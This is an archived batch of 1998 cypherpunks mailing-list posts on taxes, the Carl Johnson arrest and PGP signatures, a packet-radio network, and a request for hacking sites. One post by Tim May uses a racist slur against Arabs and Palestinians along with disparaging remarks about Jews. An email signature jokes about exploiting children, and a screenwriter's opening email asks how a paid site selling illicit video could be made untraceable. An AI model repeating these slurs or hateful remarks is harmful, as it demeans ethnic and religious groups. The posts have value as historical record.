MIME-Version: 1.0
Content-Type: text/plain



Hi, 

I'm a screenwriter in Los Angeles and I'm currently working on a psychological
thriller. I'm trying to research how a particular thing could be done, and I
cannot seem to find precisely what I'm looking for. You are surely highly
learned individual, and I wonder if I could pick your brains for a moment.

Here is the situation I need help with:-

The "villians" are charging people $15 (from their credit card - or another
source) to download or "watch"  a video clip of highly illicit material, from
a specific website.
Our "protagonist" has to stop these "video's" and the people behind them, but,
they cannot seem to trace them, or where the funds are going. 

How can this be done? How can we realistically make it so that origins and/or
location & authors of the website are untraceable. Also, that the funds are
untraceable.

The only way our protagonist can find the villains, is by revealing a terrible
secret from his past, something he's tried desperately to forget and put
behind him. He eventually does catch the villains, but not electronically. He
catches them, by reliving his painful past.

Do you have any idea's?

If so, I'd be most grateful if you could share them with me. Once the
screenplay is completed and hopefully sold, I'm sure the very least I could
offer is a film credit. 

Yours,

Wayne Kopping




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 12:57:20 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03110710b21b6a259806@[206.189.103.244]>
Message-ID: <v03130305b21bb44e5bb2@[209.66.100.149]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:25 PM -0700 9/8/98, William H. Geiger III wrote:
\
>In <v03110710b21b6a259806@[206.189.103.244]>, on 09/08/98
>   at 06:17 PM, Petro <petro@playboy.com> said:
>
>>	No, more like a get off our fucking land.
>
>Sure thing, and where you live, exactly who's land was it before you got
>there?

Well, I take a lot more seriously the claims of a Palestinian orange grower
in Jaffa who is farming land that has been in his family for many
generations than I do the claim of an Auschwitz survivor from Krakow who
claims that YHVH or some other bearded Sky Father gave his lineage the
entire land 3000 years ago.

What was done to the Jews by Hitler in WWII was horrible. But the solution
was not to take ethnic Northern Europeans (much more of their genetic
material is Russian, Latvian, Polish, northern European in general, than is
Semitic) and resettle them on the lands of people who've actually been
living in the area and farming it for at least the past several
generations, and probably closer to the past few thousand years. A claim
that Yahweh "gave" Palestine to those who have been living in Poland for a
thousand years is just pure bullshit.

And it wouldn't have happened had the victorious superpowers decided the
sand niggers in Palestine could be kicked off their land. (I have no beef
with those Jews who peacefully bought land in Palestine prior to this mass
resettlement.)

Frankly, I've always thought the suitable place for the Allies to have
resettled the Jews--to the extent it was our business at all--was Germany
itself. Plenty of conquered villages, plenty of seized castles and villas
and chalets.

And if the Jews thought this was too "icky," to be resettled in the land of
their oppression, and insisted instead that the Alllies push the sand
niggers out of their orange groves...well, fuck 'em. Given 'em a loaf of
bread and wish them good luck and send them on their way.

(And let us not forget the actions of the Stern Gang and such in blowing up
the King David Hotel.)

The chickens are coming home to roost.

--Tim May


"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Sep 1998 10:27:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Tax silliness (fwd)
Message-ID: <199809090245.VAA13237@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 8 Sep 1998 19:04:02 -0700
> From: Tim May <tcmay@got.net>
> Subject: Re: Tax silliness

> not issued a royal decree absolving the perpetrator of taxes, they could
> have collected taxes on the guy who got the ball and then taxes on the guy
> who had the ball given to him. Through the miracle of multiple taxation,
> the IRS gets it all....)

That isn't accurate. The tax was a 'gift tax' and the ONLY person required
to pay tax on it is the person GIVING the gift.

Had you actualy read the announcement by the IRS it states very clearly that
the reciever is NOT responsible for any taxes.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 07:12:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Toto, AP and Jim Bell? (Re: Space Aliens Return my Drugs!)
In-Reply-To: <199809050903.KAA02997@server.eternity.org>
Message-ID: <199809082055.VAA14004@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Recently I speculated that Toto may have been locked up due to some
connection with Jim Bell:

I wrote:
> I've been searching my cp archives trying to figure out if there has
> been any connection between Toto and Jim Bell/AP, as Alia Johnson
> said that she thought Toto was locked up due to posts about AP.

someone who has been in contact with Jim Bell tells me that Jim did
not know Toto.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 14:47:43 +0800
To: cypherpunks@cyberpass.net
Subject: Cypherpunks as a Continuing Criminal Enterprise?
In-Reply-To: <199809082136.VAA01195@earth.wazoo.com>
Message-ID: <v03130306b21bbb7e0c01@[209.66.100.149]>
MIME-Version: 1.0
Content-Type: text/plain




Could our group be charged as a "continuing criminal enterprise" under the
RICO statute?

It occurs to me that if Carl Johnson, who is linked several times to our
group/list in the court documents, is successfully prosecuted,then the Feds
may be able to cite both Bell and Johnson as evidence of a conspiracy.

Which probably wouldn't be too hard to prove, as many of us have admitted
to conspiring mightily to undermine various institutions. (And we even use
encypted e-mail, the very essence of a secret conspiracy.)

It might be fun to see them try this. Would they charge some of us as
ringleaders? Or would they declare the entity itself an illegal
organization? (As they have done with various cultural, political, and even
religous groups, like Hezbollah, the Aum religion, etc.)

Interesting times.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 9 Sep 1998 11:21:49 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Gift taxes...
Message-ID: <199809090336.WAA13892@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    "The giver is responsible for paying any applicable tax on any large
>    gift," IRS spokesman Steven Pyrek said Monday.
>    
>    A baseball is owned by Major League Baseball until it leaves the
>    field. It is then owned by the fan who comes up with it.
>    
>    A gift tax applies to any property given away that is worth $10,000 or
>    more. The person receiving the gift owes no taxes.
>    
>    Under the federal tax code, the first $625,000 would be exempt because
>    of the lifetime tax credit provided to every individual. So if the
>    ball is deemed to be worth $1 million, the fan would owe at least 40
>    percent of the remaining $375,000, or $150,000, to the government.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Sep 1998 11:33:59 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Taxes & baseball...
Message-ID: <199809090345.WAA13954@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

It occurs to me that if the fan who caught the ball and then gave it to
McGyer  had to pay a gift tax then so would the NLB, after all it was their
ball until it left the field at which point they give it to the fan who
catches it.

I wonder what made the IRS back down from a cool 1.2M...?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Wed, 9 Sep 1998 13:37:29 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Carl Johnson Warrant and Complaint
In-Reply-To: <199809082346.TAA31245@camel8.mindspring.com>
Message-ID: <3.0.2.32.19980908230841.007f4360@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I read the arrest warrant and a couple of things strike me as 
strange.

1. Why would anyone post an encrypted message along with the password 
to decrypt it?

2. I thought the public portion of a key was required to authenticate 
a signature, the secret part is only used to sign a message.

I believe that anyone who is now subscribed to the cypherpunks list 
is now under surveilance. I suspected that this might be true but now 
my belief is confirmed.

Edwin



At 07:40 PM 9/8/98 -0400, you wrote:
>Thanks to anonymous we offer the arrest warrant and
>complaint against Carl Edward Johnson:
>
>   http://jya.com/usa-v-cej-wc.htm  (23K)
>
>List Cypherpunks is spotlighted by the IRS complainant,
>Jeff Gordon, who made Jim Bell famous. The list is 
>quoted, logged, tracked, and cited for its hosting alleged death 
>threat messages against federal officials, which were
>PGP-authenticated and -decoded, and their style and content 
>assessed for identity of the author, along with other allegations 
>by the RCMP on what Carl may or may not have done up north 
>and by the Secret Service on Carl may or may not have said 
>out west.
>
>We have also been told that Carl is known as "The King
>of Country Porn" among admiring fans of his music.
>
>Whether this has anything to do with the little-known person 
>we're seeking information about is a mystery.
>
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNfXxN0mNf6b56PAtEQLWKgCgiU1Gxehlqmbo2/z99YEOHA3unKUAnjbL
8u1MirEV69rZ2ZGvf3GH8wIt
=7cvz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 9 Sep 1998 12:04:14 +0800
To: austin-cpunks@einstein.ssz.com (Austin Cypherpunks)
Subject: Austin: Meet on Wed. Sept. 16, 1998 (new location)
Message-ID: <199809090421.XAA14309@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

The next physical meet will be held on Wed. Sept. 16, 1998 from 7-8pm (or
later).

We are meeting at the Korea House across the street from The Yellow Rose on
N. Lamar. If you need directions please send a request to
austin-cpunks@ssz.com.

I am sure there will be some discussion about Toto as well as the database
project we've been half-heartedly working on (if only work didn't take so
much time).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 9 Sep 1998 12:19:40 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809082359.SAA12044@einstein.ssz.com>
Message-ID: <199809090416.AAA25585@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199809082359.SAA12044@einstein.ssz.com>, on 09/08/98 
   at 06:59 PM, Jim Choate <ravage@einstein.ssz.com> said:

>Forwarded message:

>> Date: Tue, 8 Sep 1998 18:17:45 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism

>> planet and take all that fucking oil with them.

>I wonder how the new realization that the calthrate deposits in the ocean
>bottem off the continental shelf make fine fuel and it's replenishable
>and may be of a larger quantity than the oil reserves will effect the
>power balance.

Once an alternative fuel source is discovered that is more economical than
oil, the arabs will slip back into obscurity.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Bugs come in through open Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfYC6o9Co1n+aLhhAQF0NAQAn5iFtYL/mDu1PQYyZkQfWsczExcnZGGm
dO9f99+vs9ZJG8GdnqIjcCWUvbettt3BX9GkaHJloIS1x16l8vrPwB9CuIIRv7RM
6/R3BEkRtEck0HSMYQmb9H+1UvGZWJzM0mYVVILURhEtXd0bbz62CHOj49D1qBK5
LW5yRENnvV8=
=c4/s
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 9 Sep 1998 12:37:45 +0800
To: Petro <petro@playboy.com>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03110710b21b6a259806@[206.189.103.244]>
Message-ID: <199809090418.AAA25605@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03110710b21b6a259806@[206.189.103.244]>, on 09/08/98 
   at 06:17 PM, Petro <petro@playboy.com> said:

>	No, more like a get off our fucking land.

Sure thing, and where you live, exactly who's land was it before you got
there?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: If at first you don't succeed, work for Microsoft.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfYDZo9Co1n+aLhhAQEbeQP+Me7nXx6bhbVGyPD6yYmGruyaKTbwVZaV
SbKzSWS/EY2I6yQyDDw9ajGvvjOtZzqyqhGshfpXCWSgAmd/TyZ+pSAR/cjEFOru
cQSuklDR/Bb5i2ogqNNydaHXC8SzzaZYkqt+FUrdME7nZll6LAfad9jThliEDyDv
3F3RP/mV9wQ=
=yrE9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@minder.net>
Date: Wed, 9 Sep 1998 11:41:23 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Taxes & baseball...
In-Reply-To: <199809090345.WAA13954@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.980908233802.1457A-100000@waste.minder.net>
MIME-Version: 1.0
Content-Type: text/plain



This is a rhetorical question, yes?

On Tue, 8 Sep 1998, Jim Choate wrote:

> I wonder what made the IRS back down from a cool 1.2M...?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William J. Hartwell" <billh@ibag.com>
Date: Wed, 9 Sep 1998 15:56:45 +0800
To: Ryan Lackey <cypherpunks@Algebra.COM
Subject: Re: radio net
In-Reply-To: <E0zGSWY-0002wH-00@arianrhod.systemics.ai>
Message-ID: <3.0.5.32.19980909005149.0081d100@mail.xroads.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:29 PM 9/8/98 -0400, Ryan Lackey wrote:
>Is anyone else interested in setting up a radio net......<snip>


I have been thinking allot about this over the last couple of months. 
I have subscribed to a packet radio mailing list
(linux-hams@vger.rutgers.edu (majordomo@vger.rutgers.edu)) just to lurk so
I could get a feel for what it 
took to set such a network up. 

Much of my family are hams and have dabbled in packet radio at one time or
another. 
They say once set up it works well (slow but dependable) and is an ideal
way to 
carry non-real-time traffic in an emergency.

As far as a secure network, that's why I lurk in this list. :-)

If such a thing should ever be outlawed or restricted most Hams I know are
law abiding 
citizens and would more than likely conform (No Ham should take offence to
this, its 
meant with the best intentions and respect). 

I think a radio network linked to the Amateur networks sending secure
packets, 
using tunneling or maybe just encrypted traffic (There may be some FCC
rules regarding this.
 I don't want to break any laws so am still looking into this part.) with
nodes connected to the internet (or other network as well ... Remember
FIDOnet) would be a good idea. 

The Ham networks will probably stand up well in the case of a national
emergency. That's something these folks are real good at.

In the off chance that the telecommunications Infrastructure becomes
unavailable due to political or other reasons, some of which have been
discussed quite often here. This network could break off and stand on its
own carrying important traffic for those whose need to communicate with
loved ones and business associates would be worth whatever risk might
befall them.

If Y2K turns out to be a real problem (as I believe it might) or something
else happens. I plan on still being able to communicate with my loved ones;
business associates, and hopefully still get this list. :-)

I plan on adding another dedicated LINUX box for this in the near future
and will be looking for others with the same types of concerns to link with.  

>I think the cost would be something like $1-5k per station, and it could
>be done in a fairly turnkey fashion. 

I think it would be considerably less money wise, and still could be done
properly.

I would be interested in hearing anyone's thoughts on this and maybe
communicating with other like-minded individuals off list. Since this list
seems to have attracted a lot of attention from the authorities as of late. 

I wonder what the ratio of cypherpunks to spooks (IRS, FBI, NSA, British
Intelligence, Government informants, and assorted other agent types) on
this list is now :-)

Would all the spooks please raise your hands?   

You... in the back listening quietly....  Is that you Inspector Gordon? :-)


--
Bill H.
billh@ibag.com




--
					William J. Hartwell
					   (602)987-8436
					  Queencreek, Az.

billh@ibag.com			billh@interdem.com		billh@hartwell.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 9 Sep 1998 16:10:17 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Tax silliness (fwd)
In-Reply-To: <199809090245.VAA13237@einstein.ssz.com>
Message-ID: <3.0.5.32.19980909010417.00a5b840@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> not issued a royal decree absolving the perpetrator of taxes, they could
>> have collected taxes on the guy who got the ball and then taxes on the guy
>> who had the ball given to him. Through the miracle of multiple taxation,
>> the IRS gets it all....)

Of course, the guy who has the ball can argue, if he chooses to return it,
that it doesn't belong to him, and he's returning it to its owner,
the guy who made it worth $250K.  The IRS would have a hard time arguing
some legally-defined version of "finders keepers", since it was obvious
at any point whose ball it might be.

(Then there's the question of whether the ball really belongs to the
ballpark or one or the other team, and since most professional ballparks are
quasi-governmentally owned, the local government may want a large cut...)
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 9 Sep 1998 12:01:37 +0800
To: cypherpunks@toad.com
Subject: Re: Any good hacking sites?
Message-ID: <0022261586779894a81c52a54603b461@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 8 Sep 1998, M I T Flunky wrote:

> 
> hey all,

Hey, d00d! What be happenin'? My homies and my bro's are just a hangin',
man! We be k-rad kool, d00d!

> 
> any1 know of any good hacking sites that teach u the basics and stuff?

Find somebody who has been the attacker in a recent axe murder. He'll be
more than happy to teach you the basics and stuff, I'm sure, particularly
if you lock yourself in stocks first.

> also, any1 here into AOL hacking???

I prefer a chainsaw, myself. It does cause a bit of a mess, but the mess
is still preferable to the AOLholes like yourself.

> 
> thanx,
> ~Fallen Angel

No pro', bro',
~LamenessMonger

> 
> _____________________________________________________________________
> You don't need to buy Internet access to use free Internet e-mail.

Apparently you don't need a clue either.

> Get completely free e-mail from Juno at http://www.juno.com

Well, they don't punctuate the end of the sentence, but at least they put
the protocol specifier on.

> Or call Juno at (800) 654-JUNO [654-5866]

Or at (800) 6NO-CLUE.

LamenessMonger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@anon.olymp.org>
Date: Wed, 9 Sep 1998 19:04:01 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <ed4d64ff287d4e98c0e76cdc3d0e33cf@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Dear Mr Gordon,

   When I checked the
   digital signature on the Internet death threat using the PGP software
   and JOHNSON'S secret key ring, the computer identified the signature
   as one of the signature keys stored in JOHNSON'S computer. Because
   both the "private" and "public" portions of the "key" were stored on
   JOHNSON'S computer, the message can be authenticated as having been
   generated by the person who possessed this "secret key" and knew the
   correct password. In other words, only the person possessing the
   secret key found on JOHNSON'S computer could have generated the "death
   threat" message.

Why would you claim only one person possessed the secret key? As you
doubtlessly know, some of the TruthMonger secret keys have been posted
to Cypherpunks anonymously. This is not authentication. Thank you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Sep 1998 12:47:52 +0800
To: cypherpunks@cyberpass.net
Subject: Netly News on Nutly News
Message-ID: <Pine.GSO.3.95.980909054226.7859C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain






http://cgi.pathfinder.com/netly/0,2326,201980909-14593,00.html

   The Arrest of the Nutly Bomber 
   By Declan McCullagh (declan@well.com)
   
   [Part I of a Series For two years a pair of anonymous Net crackpots
   have been posting angry tirades to a cryptography discussion list
   under a takeoff of Netly called "Nutly News." Now the FBI and Royal
   Canadian Mounted Police say that a digital signature connects them to
   a bomb discovered last June in a Canadian courthouse.]
   
   It was about 5 p.m. on August 18. Carl Johnson, 49, was beating the
   heat inside the Rialto Theater in what passes for downtown Tuscon,
   Ariz. That morning a friend had tipped off Johnson that the police    
   were trying to find him, but for now he had something else on his
   mind: his music. The itinerant musician and writer had spent the last
   month furiously scribbling lyrics, friends say, and he wanted a loan
   from someone he knew who worked at the theater. It was for some
   recording work, Johnson explained. This was going be his third album,
   after "My Way or the Highway" and "Please! Stop Me Before I Sing
   Again."
  
   But when Johnson left the Rialto, his musical career was cut short by
   two federal agents from the IRS's internal security division. They
   arrested him on charges of Internet threats against federal judges and
   police. The Canadians wanted Johnson, too, on charges of planting a
   bomb in a Saskatchewan courthouse.

   [...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<p60850v6@auto.sixdegrees.com>
Date: Wed, 9 Sep 1998 19:06:39 +0800
To: "Joe Cypherpunk"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809091043.DAA16307@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Joe Cypherpunk
sixdegrees password: tapesilk

Congratulations Joe. You're well on your way to 
becoming a full sixdegrees(tm) member. Here is your member 
password: tapesilk. Use it to log-in on the home page 
at the sixdegrees Web site, http://www.sixdegrees.com. 
We'll ask you for a little more information to complete your 
registration, and then you'll be ready to start networking. 

It's important that you return to the site and log-in. Your 
membership will not be complete until you do so.

Once you've successfully logged in with your password, just go 
to Personal Profile and you'll be able to choose your own 
password.

Thanks for becoming part of sixdegrees. We're looking forward 
to seeing you at the site. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you believe you received this e-mail in error, and it was not your 
intention to become a sixdegrees member, or if you have any problems, 
questions or requests send an e-mail to issues@sixdegrees.com
and someone will get back to you as soon as possible.
====================================================================


E.SI.BAM.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 9 Sep 1998 20:22:20 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: radio net (fwd)
Message-ID: <199809091239.HAA15369@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 09 Sep 1998 00:51:49 -0700
> From: "William J. Hartwell" <billh@ibag.com>
> Subject: Re: radio net

> I think a radio network linked to the Amateur networks sending secure
> packets, 
> using tunneling or maybe just encrypted traffic (There may be some FCC
> rules regarding this.

The FCC prohibits the transmission of encrypted data via analog or digital
signals by amateurs.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 9 Sep 1998 20:32:02 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: NEW TRAVEL INFO -- Worldwide Caution (fwd)
Message-ID: <199809091244.HAA15435@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-travel-advisories@stolaf.edu Wed Sep  9 03:16:16 1998
Date: Fri, 4 Sep 1998 16:22:27 -0400
From: owner-travel-advisories <owner-travel-advisories@stolaf.edu>
Subject: NEW TRAVEL INFO -- Worldwide Caution
Sender: "U.S. Department of State" <76702.1202@compuserve.com>
To: travel-advisories@stolaf.edu
Message-ID: <199809041625_MC2-5871-DEBE@compuserve.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Precedence: bulk
X-List-Info: LN=travel-advisories WHOM=76702.1202@compuserve.com

STATE DEPARTMENT TRAVEL INFORMATION - Worldwide Caution
============================================================
PUBLIC ANNOUNCEMENT - WORLDWIDE CAUTION
 September 4, 1998


U.S. DEPARTMENT OF STATE
Office of the Spokesman


In light of the bombings of the U.S. Embassies in Nairobi, Kenya 
and Dar es Salaam, Tanzania on August 7, 1998 and the U.S. air 
strikes in Afghanistan and Sudan on August 20, 1998, the potential 
for retaliatory acts against Americans and American interests 
exists.  In addition, terrorists, including Osama Bin Ladin, 
continue their threats against the United States and have not 
distinguished between military and civilian targets.  We take these 
threats seriously.  The U.S. has increased security at United States 
Government facilities worldwide and a number of our posts have 
suspended or limited services to the public.

The Department of State reminds Americans to maintain a high level 
of vigilance and to take appropriate steps to increase their 
security awareness to lessen their vulnerability.  Americans should 
maintain a low profile, vary routes and times for all required 
travel, and treat mail from unfamiliar sources with suspicion.

American citizens traveling abroad should contact the nearest U.S. 
embassy or consulate by telephone or fax for up-to-date information 
on security conditions.  Current information on post operations is 
also available on the Internet at http://travel.state.gov.  In 
addition, U.S. citizens planning to travel abroad should consult the 
Department of State's Public Announcements, Travel Warnings, 
Consular Information Sheets, and regional travel brochures.

This Public Announcement replaces the August 20, 1998, Public 
Announcement Worldwide Caution and expires on December 4, 1998.

----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- -----
The "travel-advisories@stolaf.edu" mailing list is the official Internet and
BITNET distribution point for the U.S. State Department Travel Warnings and
Consular Information Sheets.  To unsubscribe, send a message containing the
word "unsubscribe" to:	travel-advisories-request@stolaf.edu

Archives of past "travel-advisories" postings are available at the URL:
"http://www.stolaf.edu/network/travel-advisories.html" or via Gopher:
gopher.stolaf.edu, Internet Resources/US-State-Department-Travel-Advisories




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gregg Housh <Housh@johnsonfood.com>
Date: Wed, 9 Sep 1998 21:13:41 +0800
To: cypherpunks@toad.com
Subject: RE: Any good hacking sites?
Message-ID: <C5E0C2547C07D2119A4300609794107E030C7B@jfe-nt2.johnsonfood.com>
MIME-Version: 1.0
Content-Type: text/plain



any1 not1ce th4t jun0 1s ju5t a5 b4d a5 aol?

Gregg
"If your going to use the net, might as well exploit little children."
	- Anonymous

> -----Original Message-----
> From:	kamikaze23@juno.com [SMTP:kamikaze23@juno.com]
> Sent:	Tuesday, September 08, 1998 5:22 PM
> To:	cypherpunks@toad.com
> Subject:	Any good hacking sites?
> 
> hey all,
> 
> any1 know of any good hacking sites that teach u the basics and stuff?
> 
> also, any1 here into AOL hacking???
> 
> thanx,
> ~Fallen Angel
> 
> _____________________________________________________________________
> You don't need to buy Internet access to use free Internet e-mail.
> Get completely free e-mail from Juno at http://www.juno.com
> Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian W. Buchanan" <brian@smarter.than.nu>
Date: Wed, 9 Sep 1998 23:12:05 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: radio net (fwd)
In-Reply-To: <199809091239.HAA15369@einstein.ssz.com>
Message-ID: <Pine.BSF.4.02A.9809090755430.270-100000@smarter.than.nu>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 9 Sep 1998, Jim Choate wrote:

> > Date: Wed, 09 Sep 1998 00:51:49 -0700
> > From: "William J. Hartwell" <billh@ibag.com>
> > Subject: Re: radio net
> 
> > I think a radio network linked to the Amateur networks sending secure
> > packets, 
> > using tunneling or maybe just encrypted traffic (There may be some FCC
> > rules regarding this.
> 
> The FCC prohibits the transmission of encrypted data via analog or digital
> signals by amateurs.

I'd love to see them try to enforce that.  What about chaffing and
winnowing?  Stego?  Transmission of random noise? ;)  Anyone have the text
of the actual rules concerning this?

-- 
Brian Buchanan                                      brian@smarter.than.nu

Never believe that you know the whole story.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
